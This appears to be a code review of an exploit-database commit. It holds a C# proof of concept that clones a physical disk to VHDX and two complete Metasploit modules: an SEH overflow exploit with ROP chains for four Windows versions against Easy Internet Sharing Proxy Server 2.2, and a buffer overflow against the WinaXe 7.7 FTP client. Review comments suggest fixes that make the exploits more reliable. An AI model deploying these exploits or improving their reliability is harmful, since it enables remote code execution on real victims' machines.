public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
class PhysicalDisk
{
public uint Index { get; private set; }
public string Name { get; private set; }
public uint SectorSizeInBytes { get; private set; }
public ulong SizeInBytes { get; private set; }
public string Model { get; private set; }
public PhysicalDisk(ManagementObject wmi_object)
{
Index = (uint)wmi_object["Index"];
Name = (string)wmi_object["DeviceId"];
SectorSizeInBytes = (uint)wmi_object["BytesPerSector"];
SizeInBytes = (ulong)wmi_object["Size"];
Model = (string)wmi_object["Model"];
}
static string FormatHuman(ulong l)
{
if (l < 1000 * 1000)
return l.ToString();
l = l / (1000 * 1000);
if (l < 1000)
return String.Format("{0}MB", l);
l = l / (1000);
if (l < 1000)
return String.Format("{0}GB", l);
l = l / (1000);
if (l < 1000)
return String.Format("{0}TB", l);
return l.ToString();
}
public override string ToString()
{
return String.Format("{0}: Name={1}, Model={2}, Size={3}", Index, Name, Model, FormatHuman(SizeInBytes));
}
public static IEnumerable<PhysicalDisk> GetDisks()
{
SelectQuery selectQuery = new SelectQuery("Win32_DiskDrive");
ManagementObjectSearcher searcher =
new ManagementObjectSearcher(selectQuery);
foreach (ManagementObject disk in searcher.Get())
{
yield return new PhysicalDisk(disk);
}
}
}
static PhysicalDisk GetPhysicalDisk(uint index)
{
PhysicalDisk disk = PhysicalDisk.GetDisks().First(d => d.Index == index);
if (disk == null)
throw new InvalidOperationException(String.Format("Can't find physical disk index {0}", index));
return disk;
}
static void PrintPhysicalDisks()
{
foreach (PhysicalDisk disk in PhysicalDisk.GetDisks())
{
Console.WriteLine(disk);
}
}
static SafeFileHandle CreateVHD(string path, PhysicalDisk disk)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhdx;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = disk.SectorSizeInBytes;
ps.MaximumSize = disk.SizeInBytes + (100 * 1024 * 1024);
ps.SourcePath = disk.Name;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
static void Main(string[] args)
{
try
{
if (args.Length < 2)
{
Console.WriteLine(@"[USAGE]: poc output.vhdx driveno");
Console.WriteLine("Where driveno is one of the following indexes");
PrintPhysicalDisks();
Environment.Exit(1);
}
string vhd_path = Path.GetFullPath(args[0]);
vhd_path = Path.ChangeExtension(vhd_path, ".vhdx");
File.Delete(vhd_path);
PhysicalDisk disk = GetPhysicalDisk(uint.Parse(args[1]));
Console.WriteLine("[INFO]: Creating VHD {0} from {1}", vhd_path, disk.Name);
using (SafeFileHandle handle = CreateVHD(vhd_path, disk))
{
Console.WriteLine("[SUCCESS]: Created clone of physical disk");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

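Review bot: the null check in `GetPhysicalDisk` is dead code: `PhysicalDisk.GetDisks().First(d => d.Index == index);` throws `InvalidOperationException` ("Sequence contains no matching element") when no disk has that index, so the following `if (disk == null)` and its "Can't find physical disk index {0}" message never run; use `FirstOrDefault` to get the intended error text. Minor: `GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE` is declared and never used (the same holds in the other two PoCs), and `ps.MaximumSize = disk.SizeInBytes + (100 * 1024 * 1024);` deserves a one-line comment on why 100 MiB of slack is added on top of the source disk size.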
platforms/windows/remote/40760.rb Executable file

@ -0,0 +1,288 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow',
'Description' => %q{
This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2
},
'Platform' => 'win',
'Author' =>
[
'tracyturben[at]gmail.com'
],
'License' => MSF_LICENSE,
'References' =>
[
[ %w{URL http://www.sharing-file.com/products.htm}]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 836,
'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',
'StackAdjustment' => -3500,
},
'Targets'=>
[
[ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ],
[ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ],
[ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ],
[ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ]
],
'DefaultOptions'=>{
'RPORT'=> 1080,
'EXITFUNC'=> 'thread'
},
'DisclosureDate' => 'Nov 10 2016',
'DefaultTarget'=> 0))
end
def exploit
connect
rop_gadgets =''
if target.name =~ /Vista 32bit/
print_good("Building Windows Vista Rop Chain")
rop_gadgets =
[
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x00454559, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x00462589, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x004543b2, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417771, # & push esp # ret 0x1C [easyproxy.exe]
0x0046764d, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x004532e5, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x00486fac, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x0044fc45, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0045460d, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *46
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
if target.name =~ /7 32bit/
print_good('Building Windows 7 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047da72, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x00450e40, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417865, # & push esp # ret 0x1C [easyproxy.exe]
0x0046934a, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x0045a5b4, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x0047a3bf, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x00453ce6, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00478ecd, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *26
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
sleep(5)
handler
disconnect
end
if target.name =~ /8.1 32bit/
print_good('Building Windows 8 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047da72, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x00450e40, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417865, # & push esp # ret 0x1C [easyproxy.exe]
0x0046934a, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x0045a5b4, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x0047a3bf, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x00453ce6, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00478ecd, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *2
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
if target.name =~ /10 32bit/
print_good('Building Windows 10 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047f1de, # POP EBX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x41414141, # Filler (compensate)
0x00438d30, # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x004676b0, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417771, # & push esp # ret 0x1C [easyproxy.exe]
0x0046bf38, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x00481477, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # Filler (compensate)
0x00488098, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x0044ca38, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00454559, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *2
sploit << rop_gadgets
sploit << payload.encoded
sploit << make_nops(target['Nops'])
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
end
end

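Review bot: `'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',` is a single-quoted Ruby string, so the `\x..` sequences are not escapes: the encoder is told to avoid the literal characters `\`, `x`, `9`, `0` and so on, and none of the intended bytes (0x90, 0x3b, 0x0d, ...) are actually excluded from the payload. Use double quotes, as the WinaXe module in this commit does (`'BadChars' => "\x00\x0a\x0d"`), and drop the duplicated `\x0d`. Also: the four target branches repeat the same build/send/`handler`/`disconnect` sequence and differ only in the ROP chain, the leading NOP count (46, 26, 2, 2) and the Windows 7-only `sleep(5)`; putting each chain in its target hash and keeping a single `exploit` body would make those differences explicit and easier to check. The first five entries of the Vista chain lack the `# RETN (ROP NOP)` comments the other chains carry, and the target name `'Windows Vista 32bit SP2 '` has a trailing space.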

@ -0,0 +1,71 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'WinaXe 7.7 FTP Client Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the WinaXe 7.7 FTP client.
This issue is triggered when a client connects to the server and is
expecting the Server Ready response.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'hyp3rlinx' # Original discovery
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '40693'],
[ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 2065,
'Ret' => 0x68017296 # push esp # ret 0x04 WCMDPA10.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 03 2016',
'DefaultTarget' => 0))
end
def on_client_unknown_command(c, _cmd, _arg)
c.put("200 OK\r\n")
end
def on_client_connect(c)
print_status("Client connected...")
sploit = rand_text(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << make_nops(20)
c.put("220" + sploit + "\r\n")
c.close
end
end
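Review bot: the filler is not filtered against the module's own bad characters: `sploit = rand_text(target['Offset'])` draws from the full byte range, so it can contain 0x00, 0x0a or 0x0d, exactly the bytes declared in `'BadChars' => "\x00\x0a\x0d"` for the payload, and the buffer is sent as one FTP line (`c.put("220" + sploit + "\r\n")`), so a stray CR, LF or NUL inside the 2065 filler bytes can break the line framing before the SEH record is reached and make the exploit fail at random. Use `rand_text_alpha(target['Offset'])`, as the proxy module in this commit does, or pass the bad characters to `rand_text`. The description would also benefit from saying that the trigger is the 220 greeting itself (the code appends the buffer directly after "220" with no separating space), so readers know no later command is involved.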